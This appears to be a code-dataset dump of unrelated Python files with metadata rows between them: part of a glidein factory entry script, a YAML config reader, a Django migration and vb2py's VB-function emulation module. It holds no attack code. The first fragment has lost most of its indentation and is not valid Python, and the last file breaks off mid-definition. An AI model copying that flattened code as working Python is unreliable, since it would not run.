infosys_data={}
for entry in config_els.keys():
infosys_fd=config_els[entry]['infosys_fd']
for k in infosys_fd.keys:
infosys_type=infosys_fd[k][0]
server=infosys_fd[k][1]
ref=infosys_fd[k][2]
if not infosys_data.has_key(infosys_type):
infosys_data[infosys_type]={}
infosys_data_type=infosys_data[infosys_type]
if not infosys_data_type.has_key(server):
infosys_data_type[server]=[]
infosys_data_type[server].append({'ref':ref,'entry_name':entry})
# get production entries
production_entries=[]
for infosys_type in infosys_data.keys():
if infosys_type in infosys_types:
infosys_data_type=infosys_data[infosys_type]
for server in infosys_data_type.keys():
infosys_data_server=infosys_data_type[server]
if infosys_type=="RESS":
production_entries+=get_production_ress_entries(server,infosys_data_server)
elif infosys_type=="BDII":
production_entries+=get_production_bdii_entries(server,infosys_data_server)
else:
raise RuntimeError, "Unknown infosys type '%s'"%infosys_type # should never get here
# Use the info to put the
entry_keys=config_els.keys()
entry_keys.sort()
for entry in entry_keys:
if entry in production_entries:
            print "%s up"%entry
            # up() expects an options dict, not a list; use the get_args defaults
            up(entry, {"dir": ".", "comment": "", "sec": "All", "delay": "0",
                       "end": "None", "start": "None", "frontend": "All"})
        else:
            print "%s down"%entry
            down(entry, {"dir": ".", "comment": "", "sec": "All", "delay": "0",
                         "end": "None", "start": "None", "frontend": "All"})
return 0
def get_args(argv):
#defaults
opt_dict={"comment":"","sec":"All","delay":"0",\
"end":"None","start":"None","frontend":"All"}
index=0
for arg in argv:
if (arg == "-factory"):
opt_dict["entry"]="factory"
if (len(argv)<=index+1):
continue;
#Change lowercase all to All so checks for "All" work
if (argv[index+1].lower()=="all"):
argv[index+1]="All";
if (arg == "-cmd"):
opt_dict["cmd"]=argv[index+1]
if (arg == "-dir"):
opt_dict["dir"]=argv[index+1]
if (arg == "-entry"):
opt_dict["entry"]=argv[index+1]
if (arg == "-comment"):
opt_dict["comment"]=argv[index+1]
if (arg == "-start"):
opt_dict["start"]=argv[index+1]
if (arg == "-end"):
opt_dict["end"]=argv[index+1]
if (arg == "-delay"):
opt_dict["delay"]=argv[index+1]
if (arg == "-ISinfo"):
opt_dict["ISinfo"]=argv[index+1]
if (arg == "-security"):
opt_dict["sec"]=argv[index+1]
if (arg == "-frontend"):
opt_dict["frontend"]=argv[index+1]
index=index+1
return opt_dict;
def main(argv):
if len(argv)<3:
usage()
return 1
# Get the command line arguments
opt_dict=get_args(argv)
mandatory_comments=False
if (os.environ.has_key("GLIDEIN_MANDATORY_COMMENTS")):
if (os.environ["GLIDEIN_MANDATORY_COMMENTS"].lower() in ("on","true","1")):
mandatory_comments=True
if (opt_dict["cmd"] in ("check","vacuum")):
mandatory_comments=False
try:
factory_dir=opt_dict["dir"]
entry_name=opt_dict["entry"]
cmd=opt_dict["cmd"]
if (mandatory_comments):
comments=opt_dict["comment"]
if (comments == ""):
raise KeyError
except KeyError, e:
usage();
print "-cmd -dir and -entry arguments are required."
if (mandatory_comments):
print "Mandatory comments are enabled. add -comment."
return 1;
if (opt_dict["sec"]!="All"):
if (not (opt_dict["sec"] in get_security_classes(factory_dir))):
print "Invalid security class";
print "Valid security classes are: ";
for sec_class in get_security_classes(factory_dir):
print sec_class
return 1
if (opt_dict["frontend"]!="All"):
if (not (opt_dict["frontend"] in get_frontends(factory_dir))):
print "Invalid frontend identity:";
print "Valid frontends are: ";
for fe in get_frontends(factory_dir):
print fe
return 1
try:
os.chdir(factory_dir)
except OSError, e:
usage()
print "Failed to locate factory %s"%factory_dir
print "%s"%e
return 1
#Verify Entry is an actual entry
if (opt_dict["entry"].lower()=="entries"):
opt_dict["entries"]="true";
opt_dict["entry"]="All";
entry_name="All";
if ((opt_dict["entry"]!="All")and(opt_dict["entry"]!="factory")):
if (not (opt_dict["entry"] in get_entries(factory_dir))):
print "Invalid entry name";
print "Valid entries are:";
for entry in get_entries(factory_dir):
print entry
return 1
if cmd=='add':
return add(entry_name,opt_dict)
elif cmd=='down':
return down(entry_name,opt_dict)
elif cmd=='up':
return up(entry_name,opt_dict)
elif cmd=='check':
return printtimes(entry_name,opt_dict)
elif cmd=='ress':
return infosys_based(entry_name,opt_dict,['RESS'])
elif cmd=='bdii':
return infosys_based(entry_name,opt_dict,['BDII'])
elif cmd=='ress+bdii':
return infosys_based(entry_name,opt_dict,['RESS','BDII'])
elif cmd=='vacuum':
return vacuum(entry_name,opt_dict)
else:
usage()
print "Invalid command %s"%cmd
return 1
if __name__ == '__main__':
sys.exit(main(sys.argv))
| 35 | 158 | 0.63893 | 2,342 | 17,570 | 4.614005 | 0.143894 | 0.04988 | 0.020359 | 0.023691 | 0.374607 | 0.28586 | 0.240422 | 0.202388 | 0.185545 | 0.179715 | 0 | 0.006981 | 0.241833 | 17,570 | 501 | 159 | 35.06986 | 0.804219 | 0.129311 | 0 | 0.291339 | 0 | 0.010499 | 0.160431 | 0.015886 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.028871 | null | null | 0.11811 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7769bed40fe9b0d6234a1c8f4db9eaf32d2dd23b | 616 | py | Python | band/config/reader.py | rockstat/rockband | e6c3bbd5cec9b692185cbd620ed107eba8d312af | [
"Apache-2.0"
] | 14 | 2018-08-27T05:36:53.000Z | 2021-01-15T10:08:56.000Z | band/config/reader.py | rockstat/rockband | e6c3bbd5cec9b692185cbd620ed107eba8d312af | [
"Apache-2.0"
] | null | null | null | band/config/reader.py | rockstat/rockband | e6c3bbd5cec9b692185cbd620ed107eba8d312af | [
"Apache-2.0"
] | 1 | 2018-05-20T17:04:48.000Z | 2018-05-20T17:04:48.000Z | from jinja2 import Environment, FileSystemLoader, Template, TemplateNotFound
import collections
import os
import yaml
from os.path import dirname, basename
from .env import environ
from ..log import logger
def reader(fn):
logger.debug('loading', f=fn)
try:
tmplenv = Environment(loader=FileSystemLoader(dirname(fn)))
tmpl = tmplenv.get_template(str(basename(fn)))
part = tmpl.render(**environ)
        data = yaml.safe_load(part)
return data
except TemplateNotFound:
logger.warn('Template not found', file=fn)
except Exception:
logger.exception('config')
| 28 | 76 | 0.696429 | 73 | 616 | 5.863014 | 0.561644 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002049 | 0.207792 | 616 | 21 | 77 | 29.333333 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0.050407 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.368421 | 0 | 0.473684 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
776a43d738bc9faab56761683d2b178a96cf6d30 | 655 | py | Python | pastebin/migrations/0006_auto_20170129_1502.py | johannessarpola/django-pastebin | fccc396ad4532906ac7cb0e1343c341fceb65b14 | [
"MIT"
] | null | null | null | pastebin/migrations/0006_auto_20170129_1502.py | johannessarpola/django-pastebin | fccc396ad4532906ac7cb0e1343c341fceb65b14 | [
"MIT"
] | null | null | null | pastebin/migrations/0006_auto_20170129_1502.py | johannessarpola/django-pastebin | fccc396ad4532906ac7cb0e1343c341fceb65b14 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11a1 on 2017-01-29 15:02
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('pastebin', '0005_auto_20170129_1333'),
]
operations = [
migrations.AlterField(
model_name='paste',
name='creation_date',
field=models.DateTimeField(verbose_name='creation date'),
),
migrations.AlterField(
model_name='paste',
name='expiry_date',
field=models.DateTimeField(verbose_name='expiration date'),
),
]
| 25.192308 | 71 | 0.61374 | 66 | 655 | 5.878788 | 0.636364 | 0.103093 | 0.128866 | 0.149485 | 0.396907 | 0.396907 | 0 | 0 | 0 | 0 | 0 | 0.069328 | 0.273282 | 655 | 25 | 72 | 26.2 | 0.745798 | 0.103817 | 0 | 0.333333 | 1 | 0 | 0.159247 | 0.039384 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.277778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
776ab60110d0cc5f95a05461c25be9b7a11b0d17 | 23,202 | py | Python | vb2py/vbfunctions.py | mvz/vb2py | 6ea046f6fc202527a1b3fcd3ef5a67b969dea715 | [
"BSD-3-Clause"
] | 2 | 2015-12-01T10:52:36.000Z | 2021-04-20T05:15:01.000Z | vb2py/vbfunctions.py | mvz/vb2py | 6ea046f6fc202527a1b3fcd3ef5a67b969dea715 | [
"BSD-3-Clause"
] | 4 | 2016-07-18T18:28:24.000Z | 2016-07-19T08:30:14.000Z | vb2py/vbfunctions.py | mvz/vb2py | 6ea046f6fc202527a1b3fcd3ef5a67b969dea715 | [
"BSD-3-Clause"
] | 3 | 2015-07-15T21:08:19.000Z | 2021-02-25T09:39:12.000Z | """
Functions to mimic VB intrinsic functions or things
"""
from __future__ import generators
from vb2py.vbclasses import *
from vb2py.vbconstants import *
from vb2py import utils
from vb2py import config
import math
import sys
import fnmatch # For Like
import glob # For Dir
import os
import shutil # For FileCopy
import random # For Rnd, Randomize
import time # For timing
import inspect
import new
# << Error classes >>
class VB2PYCodeError(Exception): """An error occurred executing a vb2py function"""
class VB2PYNotSupported(VB2PYCodeError): """The requested function is not supported"""
class VB2PYFileError(VB2PYCodeError): """Some kind of file error"""
class VB2PYEndOfFile(VB2PYFileError): """Reached the end of file"""
# -- end -- << Error classes >>
# << VBFunctions >> (1 of 57)
def Array(*args):
"""Create an array from our arguments"""
array = VBArray(len(args)-1, Variant)
for idx in range(len(args)):
array[idx] = args[idx]
return array
# << VBFunctions >> (2 of 57)
def CBool(num):
"""Return the boolean version of a number"""
n = float(num)
if n:
return 1
else:
return 0
# << VBFunctions >> (3 of 57)
def Choose(index, *args):
"""Choose from a list of options
If the index is out of range then we return None. The list is
indexed from 1.
"""
if index <= 0:
return None
try:
return args[index-1]
except IndexError:
return None
# << VBFunctions >> (4 of 57)
def CreateObject(classname, ipaddress=None):
"""Try to create an OLE object
This only works on windows!
"""
if ipaddress:
raise VB2PYNotSupported("DCOM not supported")
import win32com.client
return win32com.client.Dispatch(classname)
# << VBFunctions >> (5 of 57)
_last_files = []
def Dir(path=None):
    """Return the files in a path matching a certain pattern, one per call
    The complicating part here is that when you first call Dir it returns the
first file. Subsequent calls to Dir with no parameters return the other
files. When all the files are exhausted, we return an empty string.
Since we need to remember the original path we have to use a global variable
which is a bit ugly.
"""
global _last_files
if path:
path = VBFiles.fixSeparators(path)
_last_files = glob.glob(path)
if _last_files:
return os.path.split(_last_files.pop(0))[1] # VB just returns the filename, not full path
else:
return ""
# << VBFunctions >> (6 of 57)
def Environ(envstring):
    """Return the String associated with an operating system environment variable

    envstring  Optional. String expression containing the name of an environment variable.
    number     Optional. Numeric expression corresponding to the numeric order of the
        environment string in the environment-string table. The number argument can be any
        numeric expression, but is rounded to a whole number before it is evaluated.

    Remarks
    If envstring can't be found in the environment-string table, a zero-length string ("")
    is returned. Otherwise, Environ returns the text assigned to the specified envstring;
    that is, the text following the equal sign (=) in the environment-string table for that
    environment variable.
    """
    try:
        envint = int(envstring)
    except ValueError:
        return os.environ.get(envstring, "")
    # Is an integer - need to get the envint'th value
    try:
        return "%s=%s" % (os.environ.keys()[envint], os.environ.values()[envint])
    except IndexError:
        return ""
# << VBFunctions >> (7 of 57)
def Erase(*args):
    """Erase the contents of fixed size arrays and return them to their initialized form"""
    for array in args:
        array.erase()
# << VBFunctions >> (8 of 57)
def EOF(channel):
    """Determine if we reached the end of file for the particular channel"""
    return VBFiles.EOF(channel)
# << VBFunctions >> (9 of 57)
def FileLen(filename):
    """Return the length of a given file"""
    return os.stat(str(VBFiles.fixSeparators(filename)))[6]
# << VBFunctions >> (10 of 57)
def Filter(sourcesarray, match, include=1):
    """Returns a zero-based array containing a subset of a string array based on specified filter criteria"""
    if include:
        return Array(*[item for item in sourcesarray if item.find(match) > -1])
    else:
        return Array(*[item for item in sourcesarray if item.find(match) == -1])
# << VBFunctions >> (11 of 57)
def FreeFile():
    """Return the next available channel number"""
    existing = VBFiles.getOpenChannels()
    if existing:
        return max(existing)+1
    else:
        return 1
# << VBFunctions >> (12 of 57)
def Hex(num):
    """Return the hex of a value"""
    return hex(CInt(num))[2:].upper()
# << VBFunctions >> (13 of 57)
def IIf(cond, truepart, falsepart):
    """Conditional operator"""
    if cond:
        return truepart
    else:
        return falsepart
# << VBFunctions >> (14 of 57)
def Input(length, channelid):
    """Return the given number of characters from the given channel"""
    return VBFiles.getChars(channelid, length)
# << VBFunctions >> (15 of 57)
def InStr(*args):
    """Return the location of one string in another"""
    if len(args) == 2:
        text, subtext = args
        return text.find(subtext)+1
    else:
        start, text, subtext = args
        pos = text[start-1:].find(subtext)
        if pos == -1:
            return 0
        else:
            return pos + start
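A standalone sketch of the 1-based semantics above (the body is repeated verbatim so the snippet runs on its own; in the library it lives alongside the other VB helpers):

```python
def InStr(*args):
    """VB InStr: 1-based position of subtext in text, 0 when not found."""
    if len(args) == 2:
        text, subtext = args
        return text.find(subtext) + 1
    else:
        start, text, subtext = args
        pos = text[start - 1:].find(subtext)
        if pos == -1:
            return 0
        return pos + start

# VB semantics: positions count from 1, and 0 means "not found"
print(InStr("hello", "l"))     # first 'l' is the 3rd character -> 3
print(InStr(4, "hello", "l"))  # searching from position 4 finds the 2nd 'l' -> 4
print(InStr("hello", "z"))     # no match -> 0
```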
# << VBFunctions >> (16 of 57)
def InStrRev(text, subtext, start=None, compare=None):
    """Return the location of one string in another starting from the end"""
    assert compare is None, "Compare modes not allowed for InStrRev"
    if start is None:
        start = len(text)
    if subtext == "":
        return len(text)
    elif start > len(text):
        return 0
    else:
        return text[:start].rfind(subtext)+1
# << VBFunctions >> (17 of 57)
def Int(num):
    """Return the int of a value"""
    n = float(num)
    if -32767 <= n <= 32767:
        return int(n)
    else:
        raise ValueError("Out of range in Int (%s)" % n)

def CByte(num):
    """Return the closest byte of a value"""
    n = round(float(num))
    if 0 <= n <= 255:
        return int(n)
    else:
        raise ValueError("Out of range in CByte (%s)" % n)

def CInt(num):
    """Return the closest int of a value"""
    n = round(float(num))
    if -32767 <= n <= 32767:
        return int(n)
    else:
        raise ValueError("Out of range in CInt (%s)" % n)

def CLng(num):
    """Return the closest long of a value"""
    return long(round(float(num)))
# << VBFunctions >> (18 of 57)
def IsArray(obj):
    """Determine if an object is an array"""
    return isinstance(obj, (list, tuple))
# << VBFunctions >> (19 of 57)
def IsNumeric(text):
    """Return true if the string contains a valid number"""
    try:
        dummy = float(text)
    except ValueError:
        return 0
    else:
        return 1
# << VBFunctions >> (20 of 57)
def Join(sourcearray, delimeter=" "):
    """Join a list of strings"""
    s_list = map(str, sourcearray)
    return delimeter.join(s_list)
# << VBFunctions >> (21 of 57)
def LCase(text):
    """Return the lower case version of a string"""
    return text.lower()

def UCase(text):
    """Return the upper case version of a string"""
    return text.upper()
# << VBFunctions >> (22 of 57)
def Left(text, number):
    """Return the left most characters in the text"""
    return text[:number]
# << VBFunctions >> (23 of 57)
def Like(text, pattern):
    """Return true if the text matches the pattern

    The pattern is a string containing wildcards
        * = any string of characters
        ? = any one character

    Fortunately, the fnmatch library module does this for us!
    """
    return fnmatch.fnmatch(text, pattern)
# << VBFunctions >> (24 of 57)
from PythonCard.graphic import Bitmap

def LoadPicture(filename):
    """Load an image as a bitmap for display in a BitmapImage control"""
    return Bitmap(filename)
# << VBFunctions >> (25 of 57)
def Lof(channel):
    """Return the length of an open file"""
    return FileLen(VBFiles.getFile(channel).name)
# << VBFunctions >> (26 of 57)
def Log(num):
    """Return the natural log of a value"""
    return math.log(float(num))

def Exp(num):
    """Return the exponential of a value"""
    return math.exp(float(num))
# << VBFunctions >> (27 of 57)
def LSet(var, value):
    """Do a VB LSet

    Left aligns a string within a string variable, or copies a variable of one
    user-defined type to another variable of a different user-defined type.

        LSet stringvar = string

    LSet replaces any leftover characters in stringvar with spaces.
    If string is longer than stringvar, LSet places only the leftmost characters,
    up to the length of the stringvar, in stringvar.

    Warning: Using LSet to copy a variable of one user-defined type into a
    variable of a different user-defined type is not recommended. Copying data
    of one data type into space reserved for a different data type can cause
    unpredictable results. When you copy a variable from one user-defined type
    to another, the binary data from one variable is copied into the memory
    space of the other, without regard for the data types specified for the
    elements.
    """
    return value[:len(var)] + " "*(len(var)-len(value))
# << VBFunctions >> (28 of 57)
def MakeDate(*args):
    """Return a date from the given string"""
    raise NotImplementedError("MakeDate has not been written yet")
# << VBFunctions >> (29 of 57)
def Mid(text, start, num=None):
    """Return some characters from the text"""
    if num is None:
        return text[start-1:]
    else:
        return text[(start-1):(start+num-1)]
# << VBFunctions >> (30 of 57)
def Oct(num):
    """Return the oct of a value"""
    n = CInt(num)
    if n == 0:
        return "0"
    else:
        return oct(n)[1:]
# << VBFunctions >> (31 of 57)
def RGB(r, g, b):
    """Return a Long whole number representing an RGB color value

    The value for any argument to RGB that exceeds 255 is assumed to be 255.
    If any argument is less than zero then this results in a ValueError.
    """
    rm = min(255, Int(r))
    gm = min(255, Int(g))
    bm = min(255, Int(b))
    #
    if rm < 0 or gm < 0 or bm < 0:
        raise ValueError("RGB values must be >= 0, were (%s, %s, %s)" % (r, g, b))
    #
    return ((bm*256)+gm)*256+rm
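The packing above puts red in the low byte and blue in the high byte, matching VB's COLORREF layout. A self-contained check, with the library's `Int` inlined as plain `int` for the sketch:

```python
def RGB(r, g, b):
    # clamp the top end at 255, as the docstring describes
    rm, gm, bm = (min(255, int(v)) for v in (r, g, b))
    if rm < 0 or gm < 0 or bm < 0:
        raise ValueError("RGB values must be >= 0")
    return ((bm * 256) + gm) * 256 + rm

print(hex(RGB(255, 0, 0)))  # red sits in the low byte  -> 0xff
print(hex(RGB(0, 0, 255)))  # blue in the high byte     -> 0xff0000
print(RGB(300, 0, 0))       # values above 255 clamp    -> 255
```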
# << VBFunctions >> (32 of 57)
def Replace(expression, find, replace, start=1, count=-1):
    """Returns a string in which a specified substring has been replaced with another substring a specified number of times

    The return value of the Replace function is a string, with substitutions made,
    that begins at the position specified by start and concludes at the end of
    the expression string. It is not a copy of the original string from start to finish.
    """
    if find:
        return expression[:start-1] + expression[start-1:].replace(find, replace, count)
    else:
        return expression
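A runnable sketch of the `start` handling (the body is repeated so the snippet is standalone). Note that this port keeps the text before `start` intact, which differs slightly from the VB documentation quoted in the docstring:

```python
def Replace(expression, find, replace, start=1, count=-1):
    # substitution only begins at the 1-based start position
    if find:
        return expression[:start - 1] + expression[start - 1:].replace(find, replace, count)
    return expression

print(Replace("abcabc", "b", "X"))           # both matches        -> aXcaXc
print(Replace("abcabc", "b", "X", start=3))  # prefix 'ab' kept    -> abcaXc
print(Replace("abcabc", "b", "X", count=1))  # only the first hit  -> aXcabc
```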
# << VBFunctions >> (33 of 57)
def Right(text, number):
    """Return the right most characters in the text"""
    return text[-number:]
# << VBFunctions >> (34 of 57)
_last_rnd_number = random.random()

def Rnd(value=1):
    """Return a random number and optionally seed the current state"""
    global _last_rnd_number
    if value == 0:
        return _last_rnd_number
    elif value < 0:
        random.seed(value)
    r = random.random()
    _last_rnd_number = r
    return r

def Randomize(seed=None):
    """Seed the RNG

    In VB this doesn't return a consistent sequence so we basically ignore the seed.
    """
    random.seed()
# << VBFunctions >> (35 of 57)
def RSet(var, value):
    """Do a VB RSet

    Right aligns a string within a string variable.

        RSet stringvar = string

    If stringvar is longer than string, RSet replaces any leftover characters
    in stringvar with spaces, back to its beginning.
    """
    return " "*(len(var)-len(value)) + value[:len(var)]
# << VBFunctions >> (36 of 57)
def Seek(channel):
    """Return the current 'cursor' position in the specified channel"""
    return VBFiles.getFile(Int(channel)).tell()+1  # VB starts at 1
# << VBFunctions >> (37 of 57)
class _OptionsDB(config.VB2PYConfigObject):
    """A special config parser class to handle central VB options"""

    def __init__(self, appname):
        """Initialize the parser"""
        config.VB2PYConfigObject.__init__(self, filename=utils.relativePath("settings.ini"))
        self.appname = appname

    def __getitem__(self, key):
        """Get an item"""
        section, name = key
        section = self._getSettingName(section)
        return config.VB2PYConfigObject.__getitem__(self, (section, name))

    def __setitem__(self, key, value):
        """Set an item"""
        section, name = key
        section = self._getSettingName(section)
        if not self._config.has_section(section):
            self._config.add_section(section)
        self._config.set(section, name, value)
        self.save()

    def save(self):
        """Store the options"""
        f = open(utils.relativePath("settings.ini"), "w")
        self._config.write(f)
        f.close()

    def _getSettingName(self, section):
        """Return the name for a section"""
        return "%s.%s" % (self.appname, section)

    def getAll(self, section):
        """Return all the items in a section"""
        thissection = self._getSettingName(section)
        options = self._config.options(thissection)
        ret = vbObjectInitialize(size=(len(options)-1, 1), objtype=str)
        for idx in range(len(options)):
            ret[idx, 0] = options[idx]
            ret[idx, 1] = self[section, options[idx]]
        return ret

    def delete(self, section, name):
        """Delete a setting from the settings file"""
        section = self._getSettingName(section)
        self._config.remove_option(section, name)
        self.save()
# << VBFunctions >> (38 of 57)
def GetSetting(appname, section, key, default=None):
    """Get a setting from the central setting file"""
    settings = _OptionsDB(appname)
    try:
        return settings[section, key]
    except config.ConfigParser.Error:
        if default is not None:
            return default
        raise
# << VBFunctions >> (39 of 57)
def GetAllSettings(appname, section):
    """Get all settings from the central setting file"""
    settings = _OptionsDB(appname)
    return settings.getAll(section)
# << VBFunctions >> (40 of 57)
def SaveSetting(appname, section, key, value):
    """Set a setting in the central setting file"""
    settings = _OptionsDB(appname)
    settings[section, key] = str(value)
# << VBFunctions >> (41 of 57)
def DeleteSetting(appname, section, key):
    """Delete a setting in the central setting file"""
    settings = _OptionsDB(appname)
    settings.delete(section, key)
# << VBFunctions >> (42 of 57)
def Sgn(num):
    """Return the sign of a number"""
    n = float(num)
    if n < 0:
        return -1
    elif n == 0:
        return 0
    else:
        return 1
# << VBFunctions >> (43 of 57)
def String(num=None, text=None):
    """Return a repeated number of string items"""
    if num is None and text is None:
        return str()
    else:
        return text[:1]*CInt(num)

def Space(num):
    """Return a repeated number of spaces"""
    return String(num, " ")

Spc = Space
# << VBFunctions >> (44 of 57)
def Split(text, delimiter=" ", limit=-1, compare=None):
    """Split a string using the delimiter

    If the optional limit is present then this defines the number
    of items returned. The compare is used for different string comparison
    types in VB, but this is not implemented at the moment.
    """
    if compare is not None:
        raise VB2PYNotSupported("Compare options for Split are not currently supported")
    #
    if limit == 0:
        return VBArray()
    elif limit > 0:
        return Array(*str(text).split(delimiter, limit-1))
    else:
        return Array(*str(text).split(delimiter))
# << VBFunctions >> (45 of 57)
def Sqr(num):
    """Return the square root of a value"""
    return math.sqrt(float(num))

def Sin(num):
    """Return the sine of a value"""
    return math.sin(float(num))

def Cos(num):
    """Return the cosine of a value"""
    return math.cos(float(num))

def Tan(num):
    """Return the tangent of a value"""
    return math.tan(float(num))

def Atn(num):
    """Return the arc-tangent of a value"""
    return math.atan(float(num))
# << VBFunctions >> (46 of 57)
def StrReverse(s):
    """Reverse a string"""
    l = list(str(s))
    l.reverse()
    return "".join(l)
# << VBFunctions >> (47 of 57)
def Switch(*args):
    """Choose from a list of expressions, each with its own condition

    The arguments are presented as a sequence of condition, expression pairs
    and the first condition that returns a true causes its expression to be
    returned. If no conditions are true then the function returns None.
    """
    arg_list = list(args)
    arg_list.reverse()
    #
    while arg_list:
        cond, expr = arg_list.pop(), arg_list.pop()
        if cond:
            return expr
    return None
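Usage sketch (the body is repeated so the snippet runs standalone). Note that, unlike VB's Switch, every expression here is evaluated eagerly when the call is built, because Python evaluates all arguments before the function runs:

```python
def Switch(*args):
    arg_list = list(args)
    arg_list.reverse()
    while arg_list:
        cond, expr = arg_list.pop(), arg_list.pop()
        if cond:
            return expr
    return None

x = 42
print(Switch(x < 10, "small", x < 100, "medium", True, "large"))  # -> medium
print(Switch(False, "a", False, "b"))                             # no true condition -> None
```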
# << VBFunctions >> (48 of 57)
def Timer():
    """Returns a Single representing the number of seconds elapsed since midnight"""
    ltime = time.localtime()
    h, m, s = ltime[3:6]
    return h*3600.0 + m*60.0 + s
# << VBFunctions >> (49 of 57)
def Trim(text):
    """Strip spaces from the text"""
    return str(text).strip()

def LTrim(text):
    """Strip spaces from the left of the text"""
    return str(text).lstrip()

def RTrim(text):
    """Strip spaces from the right of the text"""
    return str(text).rstrip()
# << VBFunctions >> (50 of 57)
def UBound(obj, dimension=1):
    """Return the upper bound for the index"""
    try:
        return obj.__ubound__(dimension)
    except AttributeError:
        raise ValueError("UBound called for invalid object")

def LBound(obj, dimension=1):
    """Return the lower bound for the index"""
    try:
        return obj.__lbound__(dimension)
    except AttributeError:
        raise ValueError("LBound called for invalid object")
# << VBFunctions >> (51 of 57)
def Val(text):
    """Return the value of a string

    This function finds the longest leftmost number in the string and
    returns it. If there are no valid numbers then it returns 0.

    The method chosen here is very poor - we just keep trying to convert the
    string to a float and use the last successful conversion as we increase
    the size of the string. A regular expression approach would probably be
    quicker.
    """
    best = 0
    for idx in range(len(text)):
        try:
            best = float(text[:idx+1])
        except ValueError:
            pass
    return best
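The longest-prefix scan can be exercised on its own (body repeated for a standalone run):

```python
def Val(text):
    best = 0
    for idx in range(len(text)):
        try:
            # remember the longest prefix that still parses as a float
            best = float(text[:idx + 1])
        except ValueError:
            pass
    return best

print(Val("12.5kg"))    # longest numeric prefix -> 12.5
print(Val("-3 items"))  # the sign is part of the prefix -> -3.0
print(Val("abc"))       # no leading number -> 0
```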
# << VBFunctions >> (52 of 57)
def vbForRange(start, stop, step=1):
    """Mimic the range in a for statement

    VB's range is inclusive and can include non-integer elements so
    we use a generator.
    """
    num_repeats = (stop-start)/step
    if num_repeats < 0:
        raise StopIteration
    current = start
    while num_repeats >= 0:
        yield current
        current += step
        num_repeats -= 1
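A standalone sketch of the inclusive range. Plain `return` is used here to end the generator, since `raise StopIteration` inside a generator body is no longer allowed in modern Python (the module predates that change):

```python
def vb_for_range(start, stop, step=1):
    # VB's For loop includes the stop value when the step lands on it
    num_repeats = (stop - start) / step
    if num_repeats < 0:
        return
    current = start
    while num_repeats >= 0:
        yield current
        current += step
        num_repeats -= 1

print(list(vb_for_range(1, 5)))        # inclusive of the stop -> [1, 2, 3, 4, 5]
print(list(vb_for_range(0, 1, 0.25)))  # non-integer steps work too
print(list(vb_for_range(5, 1)))        # empty when the range runs backwards
```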
# << VBFunctions >> (53 of 57)
def vbGetEventArgs(names, arguments):
    """Return arguments passed in an event

    VB Control events have parameters passed in the call, eg MouseMove(Button, Shift, X, Y).
    In PythonCard the event parameters are all passed as a single event object. We
    can easily unpack the attributes back to the values in the Event Handler but
    we also have to account for the fact that someone might call the Handler
    directly and therefore assume that they can pass parameters individually.

    This function tries to unpack the params from an event object and, if
    successful, returns them as a tuple. If this fails then it tries to
    assume that they were already in a tuple and return them that way.

    This can still fail if there are keyword arguments ... TODO!
    """
    # arguments is the *args tuple
    #
    # Is there only one parameter
    if len(arguments) == 1:
        # Try to unpack names from this argument
        try:
            ret = []
            for name in names:
                if name.endswith("()"):
                    ret.append(getattr(arguments[0], name[:-2])())
                else:
                    ret.append(getattr(arguments[0], name))
            return ret
        except AttributeError:
            pass
    # If we have as many arguments as we need then just return them
    if len(names) == len(arguments):
        return arguments
    # Couldn't unpack the event and didn't have the right number of args so we are dead
    raise VB2PYCodeError("EventHandler couldn't unpack arguments")
# << VBFunctions >> (54 of 57)
class VBMissingArgument:
    """A generic class to represent an argument omitted from a call"""
    _missing = 1
# << VBFunctions >> (55 of 57)
def VBGetMissingArgument(fn, argument_index):
    """Return the default value for a particular argument of a function"""
    try:
        args, varargs, varkw, defaults = inspect.getargspec(fn)
    except Exception, err:
        raise VB2PYCodeError("Unable to determine default argument for arg %d of %s: %s" % (
            argument_index, fn, err))
    #
    # Find correct argument default
    offset = argument_index - len(args)
    #
    # If this is an instancemethod then we must skip the 'self' argument
    if isinstance(fn, new.instancemethod):
        offset += 1
    try:
        return defaults[offset]
    except IndexError:
        raise VB2PYCodeError("Default argument for arg %d of %s doesn't seem to exist" % (
            argument_index, fn))
# << VBFunctions >> (56 of 57)
def vbObjectInitialize(size=None, objtype=None, preserve=None):
    """Return a new object with the given size and type"""
    if size is None:
        size = [0]
    #
    # Create the object
    def getObj():
        if len(size) == 1:
            return objtype()
        else:
            return vbObjectInitialize(size[1:], objtype)
    ret = VBArray(size[0], getObj)
    #
    # Preserve the old values if needed
    if preserve is not None:
        preserve.__copyto__(ret)
    return ret
# << VBFunctions >> (57 of 57)
Abs = abs
Asc = AscB = AscW = ord
Chr = ChrB = ChrW = chr
Fix = Int
CStr = Str = str
CSng = CDbl = float
Len = len
StrComp = cmp
Round = round
True = 1
False = 0
#
# Command line parameters are retrieved as a whole
Command = " ".join(sys.argv[1:])
#
# File stuff
#
def Kill(path):
    os.remove(VBFiles.fixSeparators(path))

def RmDir(path):
    os.rmdir(VBFiles.fixSeparators(path))

def MkDir(path):
    os.mkdir(VBFiles.fixSeparators(path))

def ChDir(path):
    os.chdir(VBFiles.fixSeparators(path))

def FileCopy(fromPath, toPath):
